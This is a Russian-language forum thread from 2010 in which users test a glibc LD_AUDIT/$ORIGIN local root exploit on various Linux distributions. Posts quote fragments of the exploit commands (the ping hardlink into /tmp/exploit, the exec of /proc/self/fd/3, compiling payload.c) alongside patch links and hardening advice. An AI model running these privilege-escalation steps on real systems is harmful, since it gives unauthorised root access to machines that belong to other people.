    ага, щаз читайте сводки уязвимостей не только с опеннета и будете знать что та ... весь текст скрыт [показать]
     
     
  • 5.137, Зилибоба, 13:42, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Во первых - была, а во вторых, пруф давайте ... весь текст скрыт [показать]
     
     
  • 6.144, Добрый Аноним, 14:37, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Во первых не была , такие баги постоянно появляются от приложения к приложению ... весь текст скрыт [показать]
     
  • 5.139, paxuser, 14:15, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Не в лунухах , а в Debian Этот дистрибутив давно себя зарекомендовал ... весь текст скрыт [показать]
     
     
  • 6.145, Добрый Аноним, 14:40, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    да какая разница главное, что это проблема не только вин система, как некоторые... весь текст скрыт [показать]
     
  • 1.27, Аноним, 16:31, 19/10/2010 [ответить] [смотреть все]  
  • +3 +/
    Особенно порадовало отношение разработчиков glibc бага есть - ну есть, ну и н... весь текст скрыт [показать]
     
     
  • 2.36, z, 16:45, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    линейкой по пальцам через интернеты =)
     
  • 1.29, savant, 16:37, 19/10/2010 [ответить] [смотреть все]  
  • +/
    Arch, при выполнении LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 шелл просто падает
     
  • 1.40, aNoN, 16:58, 19/10/2010 [ответить] [смотреть все]  
  • +/
    В funtoo тоже suid бит для хардлинка не выставляется, поэтому не работает. В debiane - лехко, но падает шелл.
     
     
  • 2.63, User294, 18:28, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    > В debiane - лехко, но падает шелл.

    Ога, с ассертом в libc.

     
  • 2.65, tamerlan311, 18:34, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    в Дебиане давно используется eglibc вместо классической libc
     
     
  • 3.69, Sylvia, 18:46, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    и несмотря на то, что eglibc всего лишь форк от glibc, в eglibc 2 11 2 экспл... весь текст скрыт [показать]
     
  • 1.42, Аноним, 17:01, 19/10/2010 [ответить] [смотреть все]  
  • +/
    mkdir tmp exploit ln bin ping tmp exploit target exec 3 tmp ... весь текст скрыт [показать]
     
     
  • 2.71, Sylvia, 18:56, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    suid бинарник на который делается линк должен быть читаемым mode 4755 например, ... весь текст скрыт [показать] [показать ветку]
     
  • 1.44, User294, 17:03, 19/10/2010 [ответить] [смотреть все]  
  • +/
    А "презренные бубунты" этот сплойт не пробирает. Посему странно ждать исправления для них - а они походу не эксплойтабельны и так?! Какой редхатчик новость писал? Он был не в курсе что в убунте/дебияне юзается другая либа - eglibc? Или какого буя про исправления написано? Пусть автор новости объяснит свою логику наведения паники? oO

    В бубунтах шелл просто убивается с assertion failed. И фигъ мне а не рут, соответственно. Так что приветы крЮтому редхату и Ульриху. Энтерпрайзнички, а на стандарт вот забили :-).

    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 271: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

     
     
  • 2.55, Аноним, 17:30, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    с openSuSE аналогично - умирает шелл.
     
  • 2.56, anonymous, 17:31, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Embedded GLIBC EGLIBC is a variant of the GNU C Library GLIBC that is design... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.61, User294, 18:19, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Спасибо, Кэп Но это не отменяет факта что приведенный эксплойт работает только ... весь текст скрыт [показать]
     
     
  • 4.162, solardiz, 17:41, 20/10/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    Да, ошибаешься Тут дело не в glibc vs eglibc, а в опциях сборки -DNDEBUG убир... весь текст скрыт [показать]
     
  • 1.47, Аноним, 17:19, 19/10/2010 [ответить] [смотреть все]  
  • +/
    LD_AUDIT ORIGIN exec proc fd 3 bash proc 30974 fd 3 Permission deni... весь текст скрыт [показать]
     
     
  • 2.52, Аноним, 17:25, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    а, нет, вру, дескриптор перепутал, assert срабатывает LD_AUDIT ORIGIN exe... весь текст скрыт [показать] [показать ветку]
     
  • 1.50, Аноним, 17:24, 19/10/2010 [ответить] [смотреть все]  
  • +/
    ERROR ld so object ORIGIN cannot be loaded as audit interface cannot open ... весь текст скрыт [показать]
     
  • 1.54, прххффф, 17:30, 19/10/2010 [ответить] [смотреть все]  
  • +2 +/
    На Debian не работает. Вывод: RedHat дырявый :-)

    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 271: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

     
  • 1.57, Аноним, 17:39, 19/10/2010 [ответить] [смотреть все]  
  • +/
    в ubuntu 10 10 mkdir tmp exploit ln bin ping tmp exploit target ln созд... весь текст скрыт [показать]
     
     
  • 2.80, Sylvia, 19:37, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    жесткую ссылку можно сделать в пределах 1 устройства, у вас наверное tmp и bin... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.84, val, 20:32, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    у меня тоже ubuntu 10.10. tmp и bin на одном разделе. то же самое выдает.
     
  • 1.64, Vasily Pupkin, 18:34, 19/10/2010 [ответить] [смотреть все]  
  • +/
    LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] ==
     
  • 1.66, Аноним2, 18:35, 19/10/2010 [ответить] [смотреть все]  
  • +/
    В основной ссылке по новости есть второй метод атаки
    http://seclists.org/fulldisclosure/2010/Oct/257

    Почему его еще никто не попробовал? Там ссылки
    делать не придется.

     
     
  • 2.70, Аноним, 18:53, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    пробовали не работает bash line 28 tmp exploit traget No such file or direct... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.76, Аноним2, 19:15, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Что-то вы не то делаете видимо, но и у меня не получается Это как раз способ дл... весь текст скрыт [показать]
     
     
  • 4.88, Аноним, 21:38, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    funtoo, glibc-2.11-r1
    Assertion ... failed
     
  • 4.90, ozs, 21:55, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    1 5559 А что вот это 1 5559 , у меня пишет такая команда не найдена ... весь текст скрыт [показать]
     
     
  • 5.99, User294, 23:06, 19/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Это Это - стопроцентный EPIC FAIL Хинт ввести выданные шеллом номер job... весь текст скрыт [показать]
     
     
  • 6.116, ozs, 02:11, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Спасибо От этого никто не застрахован ... весь текст скрыт [показать]
     
  • 4.117, ozs, 02:17, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    "[1] 5559"чей pid должен быть?
     
  • 2.74, Sylvia, 19:08, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    sylvia evy var tmp pkill -n -t tty 124 sed s dev sleep -bash lin... весь текст скрыт [показать] [показать ветку]
     
  • 2.78, AX, 19:21, 19/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    После выполнения pkill warning debug option nonsense unknown try LD_DEBUG h... весь текст скрыт [показать] [показать ветку]
     
  • 1.67, Vasily Pupkin, 18:41, 19/10/2010 [ответить] [смотреть все]  
  • +/
    У меня вообще ни на одной машине не получилось заэксплуатировать.
    1. У меня всё с SUID на отдельных разделах
    2. Всё с suid только на 111
    3. Даже когда я это всё пофиксил, всё равно вываливается ассёрт :]
     
  • 1.72, Al1966, 18:57, 19/10/2010 [ответить] [смотреть все]  
  • +/
    Fedora12 получилось. :(
     
  • 1.89, Добрый Аноним, 21:40, 19/10/2010 [ответить] [смотреть все]  
  • +3 +/
    Вот, а кто-то мне тут рассказывал, что в линухах держать все на одном разделе можно спокойно, там людей не тревожат переполнения разделов, опции монтирования, а теперь не тревожат еще и всякие уязвимости....
    О безопасности думать надо, да.
     
  • 1.91, i, 22:02, 19/10/2010 [ответить] [смотреть все]  
  • +1 +/
    чето облом на 2й же команде
    ln /bin/ping /tmp/exploit/target
    ln: создание жесткой ссылки «/tmp/exploit/target» => «/bin/ping»: Неверная ссылка между устройствами

    ладно создал в /home но опять же:
    ls -l /proc/$$/fd/3
    ls: невозможно получить доступ к /proc/18810/fd/3: Нет такого файла или каталога

    glibc-2.11.2

     
  • 1.97, balex, 22:37, 19/10/2010 [ответить] [смотреть все]  
  • +/
    Опять этот SUID... Ну и как всегда о сто и одном способе "как получить линукс с правами обычного пользователя" тут не поведали. Те же юзеры, которые работают в удалённых xnix окружениях наверное и так бояться что-нить "уронить", конечно без дятлов никуда...
     
  • 1.103, Аноним, 00:06, 20/10/2010 [ответить] [смотреть все]  
  • +/
    andrey evilhorse var run exploit ls -ld drwxrwxrwx 2 andrey andrey 4096 Окт... весь текст скрыт [показать]
     
     
  • 2.105, Аноним, 00:13, 20/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    если пофиксить права на bin ping Inconsistency detected by ld so dl-open c 2... весь текст скрыт [показать] [показать ветку]
     
  • 1.113, Аноним, 01:48, 20/10/2010 [ответить] [смотреть все]  
  • +/
    тестовая система, собранна из исходников configure make make install , н... весь текст скрыт [показать]
     
  • 1.115, ifel, 02:08, 20/10/2010 [ответить] [смотреть все]  
  • +/
    CO5 i386/x86_64 - пашет на ура
    CO4 - не работает

    На CO5 мы уже собрали rpms patched и разлили по серверам.

     
  • 1.124, d4r, 07:58, 20/10/2010 [ответить] [смотреть все]  
  • +/
    мда, 2 ехплоита за один вечер, етот и http://www.exploit-db.com/exploits/15285. уид=0 на Linux box 2.6.34.7-56.fc13.i686 #1 SMP Wed Sep 15 03:33:58 UTC 2010 i686 i686 i386 GNU/Linux
     
     
  • 2.126, killer1804, 08:35, 20/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    user0 video_srv expl bin Linux kernel 2 6 30 RDS socket exploit ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.127, Вова, 09:18, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    a out Linux kernel 2 6 30 RDS socket exploit by Dan Rosenberg ... весь текст скрыт [показать]
     
     
  • 4.128, korrado, 09:44, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    ls -l bin ping если для не юзера стоит r-x, эсплойт работает Мандривы, Федоры,... весь текст скрыт [показать]
     
     
  • 5.138, Вова, 13:45, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    в данной теме присутствуют два эксплойта, один скриптом вы о нём , другой прогр... весь текст скрыт [показать]
     
  • 1.132, АнонимМ, 11:48, 20/10/2010 [ответить] [смотреть все]  
  • +/
    Что-то в Red Hat Enterprise Linux Server release 5.1 (Tikanga) работать не хотит.

    bea@yam-ind:/tmp>gcc -w -fPIC -shared -o /tmp/exploit payload.c
    payload.c:7: ошибка: redefinition of ‘init’
    payload.c:2: ошибка: previous definition of ‘init’ was here

    glibc-2.5-18
    Что-то пока не страшно.

     
     
  • 2.134, ifel, 12:02, 20/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Что-то у Вас в c file ошибка, а не работать не хочет Проверьте, что вставили в... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.146, АнонимМ, 14:41, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Да правда ваша - работает.
     
  • 1.135, TS, 12:59, 20/10/2010 [ответить] [смотреть все]  
  • +1 +/
    Умные люди давно следуют рекомендациям по безопасности. например от NSA.
    Открываем "Guide to the Secure Configuration of Red Hat Enterprise Linux 5" - http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf - читаем -
    2.1.1.1.1 Create Separate Partition or Logical Volume for /tmp
    2.1.1.1.2 Create Separate Partition or Logical Volume for /var
    ...
    2.1.1.1.5 Create Separate Partition or Logical Volume for /home if Using Local Home Directories
    ...
    2.2.1.3 Add nodev, nosuid, and noexec Options to Temporary Storage Partitions
    2.2.1.4 Bind-mount /var/tmp to /tmp
    ...
    2.2.3.4 Find Unauthorized SUID/SGID System Executables
     
  • 1.148, буба, 15:31, 20/10/2010 [ответить] [смотреть все]  
  • +/
    Ubuntu 10.04:

    moo@moo:~$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

     
     
  • 2.150, буба, 15:45, 20/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    CentOS 5 3 moo co53 LD_AUDIT ORIGIN exec proc self fd 3 root co53 ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.154, буба, 16:42, 20/10/2010 [^] [ответить] [смотреть все]  
  • +/
    После yum update glibc с версии 2 5 34 до 2 5 49 и пересборки эксплоит все-рав... весь текст скрыт [показать]
     
     
  • 4.190, буба, 18:41, 21/10/2010 [^] [ответить] [смотреть все]  
  • +/
    Сегодня вышел апдейт glibc, после которого LD_AUDIT ORIGIN exec proc self... весь текст скрыт [показать]
     
  • 1.191, Аноним, 20:26, 21/10/2010 [ответить] [смотреть все]  
  • +/
    I just can t create the link from bin ping to tmp exploit target ln creating ... весь текст скрыт [показать]
     
  • 1.192, paxuser, 00:18, 22/10/2010 [ответить] [смотреть все]  
  • +/
    Сегодня на #grsecurity:

    <taviso> kees: we pwned you :)
    <taviso> (check your mail)
    <kees> taviso: aaah craps
    <kees> taviso: nice work :)
    <taviso> thanks :D
    <spender> AHH CRAPS
    <kees> taviso: well, no worries, the glibc update was waiting in the wings anyway. I'll get it published. :)
    <spender> I INFERR THAT UBUNTU IS VULN TO THE GLIBC BUG
    <spender> and i guess all other eglibc users too? :p

     
     
  • 2.193, solardiz, 02:33, 23/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Да, второй раунд: http://lists.openwall.net/full-disclosure/2010/10/22/15

    Исправление для Debian: http://lists.openwall.net/full-disclosure/2010/10/22/16

     
  • 1.194, Аноним, 06:07, 23/10/2010 [ответить] [смотреть все]  
  • +/
    ln bin ping tmp exploit target ln создание жесткой ссылки tmp exploit targe... весь текст скрыт [показать]
     
     
  • 2.195, paxuser, 08:06, 23/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    > ln /bin/ping /tmp/exploit/target
    > ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется

    Для эксплуатации второй уязвимости хардлинки не нужны.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2017 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor TopList